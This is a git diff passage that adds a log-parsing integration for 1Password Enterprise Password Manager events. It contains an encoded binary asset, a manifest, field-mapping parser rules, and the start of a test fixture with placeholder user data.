zSG6Bwzb&{86<|058Xo%w+UXphPWqdY2-egH!^2$CSUvrYNEgRs16G>@`6kCu0tLfj
z6Rf$+D*K|$hiP_&P{NWjEk)8lO;qq2MU*b-?TcKTVO{UUoX&nYH3|)LtPu^5AKr`N
zb*C(>xNSmLqH;J3Df!cqQoK!jb-<||pC~bGeyHJjY(?a7)n?K1_=&bzm9OBa0$;X{
z2B?zOSbEYeLX;Ql_h_rS#82(|4!@CLOR@~z*HvSiDB<Gg=s;#0$8}oiHl)K|Vn%=8
zVV_!#=vNwBg%<Q1WH$tenBTk0D^oJmL(|5Y?CRs?dhOPO@m0+sR3h+?_vp126WvGA
zH0)@mv$vW-K0IjCeuZP7Mr;0RB!$<AZctEiU|c4VPz%(~m(_wbUd<Aal>wEmo4mO(
zTs1o02Y=$RsdH;P%tcd1BfVo(4|Ax+bX49+A&IA~opcpe@qAf{hP2<D6xd%o`5k#!
z?N=Ff^U{tIQ;LgT=@kzBaQMFH&mieF9bKLY%f5)9$Lsg9LM@|(DW)$^Mp4h`Pn8eJ
z3Hc$IMW2b^DH&P_m5{a+n%GBjA2{r1W`ZNQ4gX?EpQlrybBWUY!p1?9oIX`aTrxuv
z6{7F9;Kq&8Q{r4nH$0<AzR*2&63oI8RRN@_K&*An_=z$ILc|A^IvZvB{9J0hafC|^
zUFDuHnk!-YxL~|3?sh{Pi`#j&Kc*60RfV+7a%(RC{FcZ-h#8;c9w&kv4R?~~el!i0
zv3;n$#g@#{sd^9+A4a6@xqaA@QE@eNur<9JMB53)1vo>=m4n~T9M@!llS>U7v_<Ku
zy&g9k>%bFhNPiUlEmC*<VBe3q*N&<Nrjb#FoPJVR_pPNfP5XIVzqk6Sq5x~+F0`lF
z*>qJUGDG@jobfUF@ygBtHf`RT>x6cUO1G2w3!EDLX4A<G+3{Y4!cf|i-z9Vot27rM
zaH|z9#Dy5PJLndhwOy`?`GJ)aur@QirN<Oe9&Fxu8NZK>JLNo(lK2E%eO+wvopP-@
z%x2->KVMBCOI?-YgLH3h^?VXk87D17kV3IBRWWJ&WuSAY_DsD~gfLg-*5cxi%8@g2
zt(|hgP_A&JKO*&uIjaH|y`%e9&Fxs{jX{E8>WbF=6RJ}d$^91)C>ybVoER77d2(NX
z@Xc>ZfhMOs2hs?O4`JRcmj0CFBoe6a9r{iwT6a`5?F#o^u3TKC!(!$IY4_jIKPz_?
z(xoFJ<Rr{e@crusrC3uw*V=Ab9{ZvZ0YCQQBBS6jb-9JTGn6Y^QDqBXU65Qiw5#8N
zt=&)h$q7oc=t8~DZ)AV>I?OZH;_z{A{SfO>gEA6@CP;O<F-L1&&Z(lOILXALo^^}_
zZ>@KQggiYVqh4C?1V70mZ~0+L-P|TCz#q~9?ebKn&eQK|KFVMyB2&)m&@aw9Dv{=L
zc4r;;Qz7?@?TS2;_nWc{>E`3!6^COY970;J=*P#hX#!`br(!-;13EnW^9Jg}Gx;X*
z5n560&eDRub_5xO0CeR%G@&o?z(D1(jQiSc;acymV66!0Xo6rWmL8iy;)K)EmHr~y
zxWRb#RwSfhfr%i7W&d>vHWW^%Ut=)#UBQNxVt;8vrp&q{NoWiiD#Jh#l4z^XHUs}8
zhjnw+SrWsyWE!oe_GxfbFk~n+lf?7W54jGnGa#0SvL~}f)wG8w!oec<_cByNTF$Ti
z(`sn@M7i0Ii==Xm_t|gwn&U19>yuN|CcU#@9t0uzj}329ymE*0mt70!(#2_hVPMPa
zh<cz&>FqoF4}+A^Db8<`?fZ8a9r`-0wpc5TD!LP?p9NB*@^tuaIL$(Wu$Olg-?X5U
z-THFwMqG3(FgPUmODH-H5}h>v9$PPVTf+DmeUHV=QG9|{qf=p09Kj=tp~CrOb=z@b
zN_FEZ6QAmvw&T5f7Cx?Nf+xhuUuO90j(?In4&-pJWNqXv``YrL_Kd5-7Tss`KI5b4
z>uZsHqVKY7($2fg<>TK&L)HmzJBL#nRJ|8dX+&7rbfK5eEtq#|um&Ghyp4~naXoJ(
zqwSN_qX~AEOm%r%OP$zp$0S865L`nk<ibcM<ZeAD+|DnT*)682r3=zU_Xpbj18Vf}
z|7w!VYK)T7{AvwF1dxk#+XX7arjBT<O_87`g-ooFw$5*N`Vw6ds`NJ|{c%^`pR^6X
zp$+*WzSCX38~sjtZleadyGx!ZDvn0O@I1>Jz8v;dw291fKQr-xdgL}R)Cc63@H<6O
zA<`P56eSW*Kwo!o`h1hW=2^ar12GJFn>3X`zNmeu3g$H5@OhWZzQk$Ng^;hNhYpoZ
zvFNM;v&JDWBcVsVWE=@O&d!<>Ib&t=3;BSiu0|<t>l9;PM2UdDfR2A0SP!<Q;J(_E
zpK%5He;>+=4?;qx2e+Ue?3YyD&l6P|3xeil^v~op_P)-~t2#KcmW%e64a45-4|Q*Y
zQIu4aUE`o=8s=!^SqQOg&l4p-Md)7Qhu6L>im^E7jqB%kKn?}>_K4h~z{eAQ1&l!K
z*#W_0KTTm^v7$(;2`C^Mgp<Kp3{H9rK{WRL+%+M%GBow*AD|W`=16bp9|(zE>TTdD
zowJZqM6E3-=Y^1@vHh&QSRZu%65-TSyUnt}-U}BpG|uqgV6BRXrx-}=a~$nCg*N`@
zu0PIx+)F}xy?P<P&XlOx8*Lv7k^h27E<GE^-h)IARKYFn1};ICn&~}bc10$w<G5Tr
zqe6#np)X5(kn=dq*o5LZSUCB{=IAxist;9eGSvsVMAVs2iE*$uWaa#L;waR%x%Vj3
z!yb}d-%K!PqT*ma6pQUjOv{pg#R`04N9UZFBUiv8mi{3S`e3W*X+I!;K~15%D>cr?
z&r_tPSzv@<_ua78qZ%^mDuXqoH!Ry0nh<!}^m@PvVw5SToWSs&N90k7@Zd%9$&@%)
zg#`Y)*WQ=v3i2JDe>z~5oNr+WKc&BC!bp)tT{%^qM2;IgihtG~0U_nge}yKD^J*5p
z_Nzg>UEisbl#>Zp1(DBM#W9mKJguEnsLGs>v3P!lZ%tO*{YT$et0zvU{f6!Iqi_}%
zl&~)5cBL<?u~>>!s4Yem<Xl$2<o9WC!Zl(hO2WAe>SJPlRJaHxp8Dghff#(T`zk!t
z(FDD}^hKZAfm@hzJop{@n085f@D|atwdC1?ZyNB%bW<Zo=a3RJFUX+sZx95yFSg3(
zQ%!y}XMSV(kj_)Ea~|o5sJs8>#5`twUv#pxC(^uw>^4FI<t{2$|F2YaH^93YJ8z0q
z6~N)w_Gk8a_$YG9ncCSV(jVg8XzouO3c$`h4;pDdvmiiiSyrlKAcI(#A7UlHEK)CD
z=wHSCqr6Z`NR<bv)c*u%-nkA*8A2#59)~iYmPTx?^S+eUOeDuU;)E&8003621&4{u
zWb%T4&3FSY#jX9d6CI3lc?v!Ue>Otqvv!BNt;W;}?BZr86Eu)QlHJ@Zx;^~koxLD&
zE86C(xt}12MQ;2D;vk1y@4$PO@(glRU*`?_Dvv{pyzhrb1|=7N1_2A~Nm4&H;X)*>
zcV{-ul|kf%Rqhlf!ces_@?zrb3o2E_pfeC`2h6o%^K##~+YtKPxvBOFr^UaYSAQIn
z>8Qs?X7lIHPPH%jk4436B!A1%qC;FdKQ}B4gt&1Y^yz(TKE=8`;-PN&Cz=@uL4@_+
zG^m`$zcmqsNc0S?q^LAWku7N7r(pliI1FLqJ;Ty9h~YY%9TzO(&#`O`gPi~e)HsD|
zLEijIbUv4E<2fb}L`0Q%K&h7zHQu~M9>atcaDdzIHGV?3`p{A&Gtg`3K>sO~nuv@!
zDwO~Gm(7=r$hk@gKcC@J_|SdF?{}hVRFII&cXv8BAxOAgonrBE_5$@N4HT)Y!lP|&
zYRVA)Ef<=r?^bJv|9DjP8&UjBu;tg5nTvi^8#7iQAspUP@R`(AwFk5Q)XPr?K$2ai
z8;MivYXepPrKML43Wg@Hqbbr2pkU`!$rC_1`qR7(rVCU&$e4F2dXC9HnQF|dvFG#1
z2S7)BoWe}Z2N*nWV~l<oXnc9U*HM|rsc~5v0=AH1z<2%|=sGb0wmV$-82pn#?OsQR
z{5yJ4001|GqLoPO*BHuyPB~cP9GJeYpZ)-`)$H9tHsp!U5tF)>pj@o{cfZMkpv>uL
zYu-8iFQyX`^!ab!Ri{GX$Qc$10qS2}L(O$>C)yN>F5`GQJ7*kNdyx+G!RdV)X?15>
zBLop^CuEMqQ>JGlgzhrN2lY%X9~|%$USvyP>?OcHAKx@fAX?Hwy4{@N6-HUfliw>2
zsV2AwXbKqzUR@LNW8?B+>GjT*X&9^rw8xfc)t7tXW4`^ocK(gN_ut``mNNXclIe3E
z0v|WgrxH{7fa)tdegHIPC(^WLsJg;&H8M_?<N5YAnL6{fy5rK&if=f3b$bMO@TVKl
z5<kZ8bo3&XlhC73N!q1v8Q8;gy_omf<h4JgoMw(NTnJin5Gc0i<8&-ak()!d!x@{O
zRY+$YrltKs8S^7JI4_3T#CtPfTWEd%2k_(4t#Ols*IXDiCH<Z0y^{tf8ychemFJ3c
z?gcV%d<V!i<<yvKEGms=n__SM39;7p6Ay+(H~)$lvh8+^W_~$Oe5}2-($Ak?V?kyJ
z;hgP3KJFGl22~{J$>D>4{?^tQt?DaF4q3=0U!d0A3gGyEob3CeY)EP`AZ1GV_5i~b
z9Fid<@h$f^FWsNkIGi${?H{>-+#F&GN=o6|7wX_$i)hpon?X5|glo6m1yCjP3s}WE
z>Vth=1MV1h?cVn7TW;DE@1zEXzFK`LNG;V&bkOJQ(aVj+hIEgszC?sp+7j_?Ijl6Y
zrm4TEx(L!~@3@>s$%n0qlbCXq>FfNF>#>lLeCSK%mp)?=FY!$fSof*xTNm@dnoN-$
z`is=IM>v3=Rz5nwMtveVcA|hfRmZM#BTWch{n5G654HQ`A<V1=_>1mWJBbKWC@2KX
zc7L<hw(_rrslX;bbSQ{6NcYya9fWNWzRFwXdv()?jB{u8(MM(22EC~-M#LNP*<g)K
z=Jpiz-iv$g^qw36gYA}Y9D<R}r3r1~$I==;Cu%^+z@OvDL?Y7aU`zA$Y;o^pSV^33
zrrR)Nf8QgsGVdGyuu|Xqo#pL1&tHHqyBBtl<OUOvCba%RIN0@%6BY!))<M1;TyhcK
zX82h-qq)sj2zA_9@FW~WPH4wvU&E_wUog}RCzkBTv~;}w(XM9S>Ao#V$yuIekg*#@
z@o92yn>`%AjS`keU(kk)#;vLV_!!h9x1APiUyMs~E=_0=Y|020%Md%_W9t6=#}M}>
zMTJOW5UfSX&)M8crL$WRE_A6Q38S!j&<N}sy#7k%(p$AX+sXK`5Y3G;d9Uzt>WOMv
zqAo_Z*7@ds7FqA+Z<Zi%p|uxLb~$$Y;;DpSP6p2!^Gl3`=Rf{nEE6JUeb4RNTz@2`
zban9PQ2d-xCy5U=VVz&#{^5qI@_AeRczpDn+1cs<!dTM2DEP}c$ziT4=JzU=j1RJ_
z+(`z_7I%q-2n86v;GoXu`^TWdT-ZG?k`mFAqERjB1JoM+8i)CQN^|@4yff!UTPOOm
zEAeV@1M%<rCMWpad+xg1e}{+Jfu_Qo{TXx7JOC$c%&u3u-Y%^5WtvO`fjTOitH*ot
z!Z|hw`P7sv+uY{#<2mAL#C`udZX$w6Lx3(*{*h|=v-V`$M#K0_r)QvQ_}hq$APh5;
z0)s5Kkyzq$ANTzV8IZ2<Uu|2&L7y~h{WJpWjSWl}MMFW#oy~Pz-PV^s+2oss%0V&q
z7<4N69CMPPe2*_8!AE;$(*)b-7uY>JS6Fxc-G{7OgUB4Xq%S3?MPRYEn@~a3<zGie
zsZ*KTJ?Vk!gFfH3Nhu#nvCTelm3%uzgh9%M6KPa8C{^!gD=OK*gBWf`pJJrMcIvqF
z>kBTnHKyo$IOS-()~(C#oelWl;)}f!A*3;X<%mjC@`l~x-0GGEDHdLWgtp2023bcD
z6(R%QuDePT;Vq$%BzC)LGIbr?Id^Mmv#m`nwwvjCnMIrZ9S=n9ydKoi*U3My@7ycc
zcu3?r>iMlseCjJF5@9T_VEGu_R)Xa?t|2@#6!dYDS^m{IG=`oji>yiyz0>v=mL0j^
z%%b2wej2erSKpo=+ge{dTWiR@shl;NUH`k&yFN7hcwTTuqMg@Rwwgk`*+SV56dH`~
zhS(!KSd~2{;-IljD(ZEqZ;HaQe68eUB-kwC*}2cRMsrb!tTEN8eKZiu6HR`9IiA0y
z!Qs%!TXbWAvfzC852r9icO|AwBtsN(@#GSeXBT$-7bR%a)YfhOJtZiEzkGB{<^EZ6
zTtRvOt%?tXb*Y?dJA*E~HN@y*C)T*5rTuh}SJ_N|Mgr}WqNX>G71%((CkN3g<3~tp
z{ZnrvGu)sSoXM%EymW&p^su;5@`#TB<JD}kLq1K4)3NCoA^tEC*#A=^<JRt}kjFo%
z*qHfE?O@F}W6W22wPG(m@eybnv~(^V6!;0-_QLZW`so25re%pL(Ys0e;qiV_61h%_
zn%3*0Cl5P6KqU2&YeMUG%cR0b$Pk{je1C@0qhe=3&?Gl==bc`%aFmH#5iq?{>AL*Q
zeNU`>%Gw6(woxxbI`JeiQTw?sPf1spK1PtS;l#42*T#?-h3VzxuBTETd@|TuqGgb@
zIOO_0@Way@m6tYJW0eLkc>RNNQ$m@v;8BL^#Cp)mU*htB29lvnF>gRRp3LgVR-d7H
zb-YBVg_b0&JD<6{5MPF};W3$<lw#*R;>}WTn#NPY5cB@sTWKG2s}*8FRsW$-ju`dB
z!P0cpw-3N_^`vqBV{?vDSU4TwH;q8+`y#H?%VLB#ca{f3r7j=uTbXv=x$M-WZ8trW
z@pRMU?IgM-%Jo)#ooSuxH%)&QW@jWOff{!=C0H76c9w9T12Es>4wx81Eu!d$11@}%
zAOd;(+?L1|YGD{@K3bHpDq;Y2NYCR5YouYYVzQskllq<YEHr<F{k3c^bz5TaO~6H+
zFLn%=U;8}zL#{05>upK42Tlte-R|r7g5S3Mckps6BEy~T@tM_cJ%Sv)Nd=Cxv9#wo
z14*<N0&~mfprK4at4llUaDASS2Bl-}y4Y*awnuJ6<EMVoK35$(*h^!qB|?0dOlHfI
zE@dm|kD=WX&Kn<<yxBa3m794ZasOTBK{){*`-E6pCo)8zSB3WA_J48$6sp_ax%fSQ
zj^E+i8?J>9n)|G{h{(I-DMy<gy=fuGIs1yiz)JP&G^{uyNZDIagtFePsm(-<a#M|D
z4<C`klA174^Xf!EZ8LPu^LFWb`0lvhHlNaf*J*I<zrjAd2&jX?(`=o!<p-ncbIio9
zeU6^?Ia!x2h9B8I48Qe+CPZ0Oz!RgfAzumCbZ+KGM46rDq;Nwph~BJIIcjb*o{byl
zN`%DLUM4IJV6wV;N?u&%;P>buvT4TLR0`kqbU)_VxH{St6Vn^exdYFmGzV!TDwc^>
zF<w)VA`2JX^$q3zrg<mh^<#!cC#z<J4h8`<2#=^08FuO?iSZp3I<wH;sbv8F05_!R
z`hx)L*S`!s=06u31pIfWA;*Ew<rd2&x+D_6%pnr>niaNPqSKGA@o3-vIgv{+mAmC6
z%^R#9^V1>s{yAm_Yv+}r>*Fl>f~4m5kPMGNUhIcqQ2zUipi^%dot7j4MiZ^L!7N*@
zzsQ+$ipH1O^O}!rLql;0%hwe4o4hHWs}m8CQgCScbKandKC{eb3hVUCgPLcUax}?e
z{%^qX78$yc@Vk-#jEI)L=`?S3b;U2Tv`FwzPj^YRIhux(CA=L2|K_4lGMNF6XMDS?
zuo4TQueFh5wN9E!*AeX-0bm2~jHP2v1au>-W0U&qT7rH(pFuySTES8qTxnvzdezXe
zy1nZ+Jeq}uOt77nd9~0oDwagSW2Us7Ppy6JM=Pbdz8r*XiFcLJ9MslsWbaM<DB{=;
zf8uG+33>|+{!U4ljZ&?vbT`Z!g>jQ(>1@v&-1VBjI2g~_5A5PvSN}wfQDKYH{mEJD
z>P}A_1f~|pV&P6`wa=jjq<ZhysD);9ALK&4jEz3c3B*N!5NUZo!j4RQ%q30qVrzA9
zP1W#WM8AHvA8QVwduG3NvWXm1B@Zy@@tfw8YT@nBmk{y6AS`rUnRJbsGn1S=9XC~U
z?L0WmjZn_Tbq6UV<7uG7<V=}KRMp)<LVso4a;=P(C`ELNN5398AxbKdDROHwl%9u=
z3V{nlYKdvrh>b;FM_aG?&xa!2BLK2!O!#vOwAf>YKxQCo#M!4QZa+T^78gbjhtJZj
z(`yk9d<{4X(_Pu)a%8pL*6Yto7)G{<UJ!owpGFoV;{gm3GpvTZ+OSH(j@6&Zj9!G`
z>wm)zRBIEBatkA(NJFV&u#?|1*JrU+0~_#95#Q>cZK;eWN3lI7jOX<_?`jIaSH3;L
z>{wHzQd3Gim-GTQj;sA*zmYB;DQR0Qyt(InK5*Tr%VhWw!d?ULMe{+a2tOOt<CaZ!
zv<Z1{AH)Q`DnDBLRaP#86&jT&-ar5=y%QJfx%vXBv3%sPtw*poc}pu(>raW~V5g#8
z`gHxVZO|}x=j`+G>Q^;)*+8LW7^gzHF~L3_g!tS(Br0W*!b^dW{Fbj=BmHSH@$B=G
z6)DfmD(cWJWCn5L_b4K0DD`Qk6Wbd~l=;1%W~ImF?Cnm`w-4&sm0F^=)M-VKNKILG
zRE^qNu%zDNB*?ngMj`%v{Qd$Ju=V6bRa>XbyEb~oI3qcr3r}HY%d*?8ywZqpUwy3k
zbe&!_1qG^5iD<Lh26M1#dAtQQpJXdaglub?ov#v9C~TJrPBGjr5p|u{{DMA|&h2d&
ztO-K#TbgfI8!sb{b*ud>p>``EdzH~OKa$bP^wV`@Mz+h#ueU?|UPE~5D${r^ffEf}
zg(i=)10a*iMNoIM=c|X}St0a8j*wwc<;&iv0%$1SNa`tsxrk7PuEgCzWS$Wif8Z1a
z;^U@%_qNH#P}#FgEok261w;366%tQ>YyHHWP;gl&$g}CyY22PlJ>akZpp7G4#K4L_
zz7jN9+vP@wYJH%AnEn2>_@QSOKsM)1w>SCvyO)E3!LP75;i(b71OY#-Y-HWIm9;4=
z)>?DgA4*I!Mg<P_Ovxhdd(6yC`0&crW#5+55;lKypg{16(iY)Ve5iVdn8g;)#{Y*-
z?6J}ut4aHBHmA1^&~UTcCJ)?jd~HqAUBkuE<<%?^#+ND57X1b8h1w^3(zK*!7dIQ0
zKa8r;uk?^VP6K*Rg3?7htj=BHSs(d_U(;u5JVECp$PyJ*zn-f*g$MDHxFcR|Q=&CL
zBaUKBQRTESqU(M``{O?cX*4iewD{_9LZm#I=aKon?8}>`nscP)-uVisJ};?73pssU
z!*9+>3=4b8>~zsTbbZ>#Iq?j{mFZvdu~b~a^s-5#-#>z$)c6sMh}_<J8-hk^d{@)-
zZ5m^(-Q<wtHtnyrDw!r$^0~FOYx7Us@_3L3(zaV75sx<6%6hH#DI{~sj#CXOS$XZY
z=5mYQ)|#jX3o|zQ#8YA?{{~F9WT$8Oc)M?!%$LZTq*>A_F9-?Gx#v0XK$1oq89{$P
zfW9&qd$=T-J(H($8w+?qhFDc9SsL^3FeAT`f;{VxGh@~tyY#0T1`JNW=dy)0e3qeA
z!jxRBu8Iv+3}}4@<cDR|+80ZxJ3XFhaLE3!qvLt8=_WB!L~IWzZ%z7hv~1?t7)>ER
zrW97uVz2r_%H5tih&pDWoEXX9KOmn`T50uEE9yZDqajHtn(nsDsaEX{AX2y=_-=ZJ
z_{K;HyqQR;_(NLr%Q#5iQ=dhd+}z`|d&Csqsnxly#+J8~(h%_Yyt!)c5$<6I>}C0h
z;^etw&}6HZ;i0UnecpqLMVygtzJF)<=-P5^wx9*&wM|k!kNv=-V~*1!iZ#0Uv|e9h
zR~_o}n#wubODeVAMy1wG*uM8uzp>1|IB5?Iwn}2q7~`d}iF7SP5LtrY*L?kI^4giV
zi|L?Q^H^B@wNV@RkUk}9dSJ)$t9}8x{YkB5!2TvKlwB<$ZKgZ`_)CuCWWGXDc4(&2
zuxAw&H>9!jsS7B4t_j&T5-GFoAQ_TJz=M{p{UR)({Uo}gb4*u8P_wW==F7%bB@b1x
zNG{Vg=_W#9EfIgrwU59L%4*C=nz4LdTF<^=!V5$6)-?~FC(^{R=_?_$fq#%uvxr6I
zx8<LY0<AAR3apbm&XW>ULFmcjqZd)dvcXmYPM;RU(e3R11nr(6*~Pc$u%B5Jax^L4
ziC><K{Q{m(VsE-)_jhsy@#s%1Dd#z%<rQ`^%CaO{Sm~+bl06!_6}B1~&GsIKYw)Ue
zsf!30fPGet_VKutWE4oasAm4`%hFO-)r(*c>Ff`?m}=5B{!7)aR9e<ByB!P()H64G
zvrzqG*4UpU+piW(U0rYRbK2DjP;OdzGcP_NC?Hkiq7sGJgbCr!ht%T=xA|SqqSC}X
zw$zy>1o3#pC?erYnp%aCSDu9uDGd3_(XIZ>oD-cpZ|(HwKid^7NW^Q2VkaB-CQosI
z{I*mwGcf5A?L91DdkkZrGg0=bQG1IJ0jw>R%qnx&zPVh_7Cy><!gS{ScUE%%`?IJi
zozxdc5Ct~)7v(|Ik+C8qwP{u-FY83N<4PwP)pscfA;kyE%?VMI<neG5xsJWaeqgo8
z&I9SiSq95fX?cn+Z|w>i$NNMu&ggz+=yTzjtjGOX#-;wyM~>pS)d`gCClrdtqU#qB
zr2yG;Mqs`t==?WAmXFO78Srw|``k|0#Irk#P^SycqN^tvBn;{e(->P;`31J{<HiQK
zw6V_>dbR9*i~@Y$c9qBvLF{GYu0d#ILvu29+>Vo{Q|O#2_==DIxQ%p)5mhV(B^O7t
zx?q#ZUR|rbm3U6dsy49Nss^4ne_=VFb<;6N$lIOp>sWiM%>1>X<Cj#}ogvE3?3N}6
zDH`eGf+W~%s#K1sJlAhH=<}*O?`)T1-IacpV|C-htWrV~MK#8YXjz??1v0@+1a2ze
zU|R5Pi=?hsa|bDn&bN5~2=XXlCdync!X|}|>Dy<}u3Mb>mLV)t<m2mKl*lcr*B|Gz
z1)bg0A>NegGOo+sgS04EO%@YBFi0eFTF})uQ5{+@xcx<!Cc$r64dS!pb2Y$IakL}J
z{$+(;i0Ql(ktiB6A=#Ldz1l!-6~~-GZQdL4eJB9Q0U$ihR`Q~UDgOmjFwxJ)Boqf!
zSZSRsQ;2suP5JEl<5Bv2$?Sy~L8&(9@0fiaF4Ar_$0Y7YmCg+c(Tcqf1lIf}cwauZ
z7@e0WIug?I_e*43QbwVN^J=Z1_;ikp2~k4M)1TfmBL_5jJ)(p??Fy_{PA|CF3``uQ
zt_BV7<=RUIQp?MT3&jy=c$vQ}SH-@j_EI<Zw#JAy@-PP2Q#QogU=1AZECudpVB|a0
z^qu5KU@D4q;ms`iw>Co8-Q8W=3lxqlV-WDf6(EiR%#vZ&qvKXUO2l@-E>z^+xcyzq
zu<jx`vyRp(%enVXn3F5r+jrOb&e9p?tm#ql5_*I5B)ENT>;$hVUcF_wEa)!6bWDwN
zx{*X92?&E*1ETpe;xcJ(Wo3Nbnn6S{6#+8R4$lJ73;RHUPzD7>2q*E_G-QH!EK`a$
z#+GGF?E*n9Gkp#{+E21#eej>c5A+0l9hGl%DXSMQUO}t-nivQGL`;K7`z!<y2@ADh
z*s|}?HilLB#Ziv6*V=qu1^%dJ(AVC*cu_xQ=W7f=2s6Xpttv;(OYz-p-1*1-rTh1;
z0yJsGLG~+4ie4a!YbFCS7?TP^n+K&sE|jD~`mV2%Q;L);dcTR6DyyODSWQ;d)wsWp
z$i6Q9Lm6eMD+2w|$0U)32G1ppo+5oG2fXfB*e&_q?U9d-ZCKLthY67&X!RqNsIFK0
zH_L*c;m)pNp$-@IeNU@EWgCxg2&k}bG=g<O=4LC2;fB-vv+QWAI$I9=*NTVAh@+#j
zy}>=;@g&V(?}y(Nn!|-+Vu4TCD+Q}RJx`xTN49VF#EbflNmE4>vQDt=c}|q=j;HHa
gYRXXaw(c-_-TyS;4D1ZT|Coy)FQXz|D`^(`KbLQIApigX

literal 0
HcmV?d00001

diff --git a/1Password/1password-epm/_meta/manifest.yml b/1Password/1password-epm/_meta/manifest.yml
new file mode 100644
index 000000000..decfb3ddd
--- /dev/null
+++ b/1Password/1password-epm/_meta/manifest.yml
@@ -0,0 +1,11 @@
+uuid: 09754cc4-e247-4712-9a76-25529ba11b8b
+name: 1Password EPM
+slug: 1password-epm
+automation_connector_uuid: f3330ea4-e492-4c57-9764-d2dcf1d044eb
+automation_module_uuid: 56f9e1f6-95ba-45ed-867b-44fb3183934d
+
+description: >-
+  1Password's Enterprise Password Manager offers robust security features for businesses, enabling secure sharing and management of passwords and sensitive data across teams, with advanced admin controls and seamless integration into existing workflows.
+
+data_sources:
+  Authentication logs:
diff --git a/1Password/1password-epm/_meta/smart-descriptions.json b/1Password/1password-epm/_meta/smart-descriptions.json
new file mode 100644
index 000000000..d3d36ac61
--- /dev/null
+++ b/1Password/1password-epm/_meta/smart-descriptions.json
@@ -0,0 +1,29 @@
+[
+  {
+    "value": "Sign in attempts from {client.ip} for user {user.target.name}({user.target.email}) with status {event.outcome}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "signinattempts"
+      }
+    ]
+  },
+  {
+    "value": "Item usages: {user.name}({user.email}) from {client.ip}: {event.action}{1password.object.type} with status {event.outcome}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "itemusages"
+      }
+    ]
+  },
+  {
+    "value": "Audit event from {user.name}({user.email}) on {client.ip}: {event.action}{1password.object.type} with status {event.outcome}",
+    "conditions": [
+      {
+        "field": "event.dataset",
+        "value": "auditevents"
+      }
+    ]
+  }
+]
diff --git a/1Password/1password-epm/ingest/parser.yml b/1Password/1password-epm/ingest/parser.yml
new file mode 100644
index 000000000..168ecfc93
--- /dev/null
+++ b/1Password/1password-epm/ingest/parser.yml
@@ -0,0 +1,105 @@
+name: 1password-epm
+ignored_values: [""]
+pipeline:
+  - name: parse_event
+    external:
+      name: json.parse-json
+      properties:
+        input_field: "{{original.message}}"
+        output_field: message
+
+  - name: set_ecs_fields
+
+stages:
+  set_ecs_fields:
+    actions:
+      - set:
+          observer.vendor: "Agilebits"
+          observer.product: "1Password EPM"
+          event.outcome: "failure"
+
+      - set:
+          event.outcome: "success"
+        filter: "{{parse_event.message.category == 'success'}}"
+
+      - set:
+          event.category: ["authentication"]
+          event.type: ["start"]
+        filter: "{{parse_event.message.sekoia_event_type == 'signinattempts'}}"
+
+      - set:
+          event.category: ["session"]
+          event.type: ["info"]
+        filter: "{{parse_event.message.sekoia_event_type == 'itemusages'}}"
+
+      - set:
+          event.category: ["configuration"]
+          event.type: ["change"]
+        filter: "{{parse_event.message.sekoia_event_type == 'auditevents'}}"
+
+      - set:
+          "@timestamp": "{{parse_event.message.timestamp | to_rfc3339}}"
+          event.action: "{{parse_event.message.action}}"
+          event.dataset: "{{parse_event.message.sekoia_event_type}}"
+
+      - set:
+          user.id: "{{parse_event.message.actor_details.uuid}}"
+          user.email: "{{parse_event.message.actor_details.email}}"
+          user.name: "{{parse_event.message.actor_details.name}}"
+        filter: "{{parse_event.message.actor_details != null}}"
+
+      - set:
+          user.id: "{{parse_event.message.user.uuid}}"
+          user.email: "{{parse_event.message.user.email}}"
+          user.name: "{{parse_event.message.user.name}}"
+        filter: "{{parse_event.message.user != null}}"
+
+      - set:
+          user.target.id: "{{parse_event.message.aux_details.uuid}}"
+          user.target.name: "{{parse_event.message.aux_details.name}}"
+          user.target.email: "{{parse_event.message.aux_details.email}}"
+        filter: "{{parse_event.message.aux_details != null}}"
+
+      - set:
+          user.target.id: "{{parse_event.message.target_user.uuid}}"
+          user.target.name: "{{parse_event.message.target_user.name}}"
+          user.target.email: "{{parse_event.message.target_user.email}}"
+        filter: "{{parse_event.message.target_user != null}}"
+
+      - set:
+          1password.session_uuid: "{{parse_event.message.session_uuid}}"
+        filter: ""
+
+      - set:
+          1password.session_uuid: "{{parse_event.message.session.uuid}}"
+        filter: "{{parse_event.message.session != null}}"
+
+      - set:
+          host.id: "{{parse_event.message.session.device_uuid}}"
+
+          client.geo.country_name: "{{parse_event.message.location.country}}"
+          client.geo.region_name: "{{parse_event.message.location.region}}"
+          client.geo.city_name: "{{parse_event.message.location.city}}"
+          client.geo.location.lat: "{{parse_event.message.location.latitude}}"
+          client.geo.location.lon: "{{parse_event.message.location.longitude}}"
+          1password.object.uuid: "{{parse_event.message.object_uuid}}"
+
+          1password.object.name: "{{parse_event.message.object_details.name}}"
+          1password.object.email: "{{parse_event.message.object_details.email}}"
+          1password.object.type: "{{parse_event.message.object_type}}"
+          host.os.name: "{{parse_event.message.client.os_name}}"
+          host.os.version: "{{parse_event.message.client.os_version}}"
+
+          1password.vault_uuid: "{{parse_event.message.vault_uuid}}"
+          1password.item_uuid: "{{parse_event.message.item_uuid}}"
+
+          1password.category: "{{parse_event.message.category}}"
+          1password.type: "{{parse_event.message.type}}"
+
+      - set:
+          client.ip: "{{parse_event.message.session.ip}}"
+        filter: "{{parse_event.message.session.ip | is_ipaddress}}"
+
+      - set:
+          client.ip: "{{parse_event.message.client.ip_address}}"
+        filter: "{{parse_event.message.client.ip_address | is_ipaddress}}"
diff --git a/1Password/1password-epm/tests/test_audit_events.json b/1Password/1password-epm/tests/test_audit_events.json
new file mode 100644
index 000000000..02050a1e6
--- /dev/null
+++ b/1Password/1password-epm/tests/test_audit_events.json
@@ -0,0 +1,65 @@
+{
+  "input": {
+    "message": "{\"sekoia_event_type\": \"auditevents\", \"uuid\": \"56YE2TYN2VFYRLNSHKPW5NVT5E\", \"timestamp\": \"2023-03-15T16:33:50-03:00\", \"actor_uuid\": \"4HCGRGYCTRQFBMGVEGTABYDU2V\", \"actor_details\": {\"uuid\": \"4HCGRGYCTRQFBMGVEGTABYDU2V\", \"name\": \"Jane Doe\", \"email\": \"jane.doe@example.com\"}, \"action\": \"join\", \"object_type\": \"gm\", \"object_uuid\": \"pf8soyakgngrphytsyjed4ae3u\", \"aux_id\": 9277034, \"aux_uuid\": \"K6VFYDCJKHGGDI7QFAXX65LCDY\", \"aux_details\": {\"uuid\": \"K6VFYDCJKHGGDI7QFAXX65LCDY\", \"name\": \"John Doe\", \"email\": \"john.doe@example.com\"}, \"aux_info\": \"R\", \"session\": 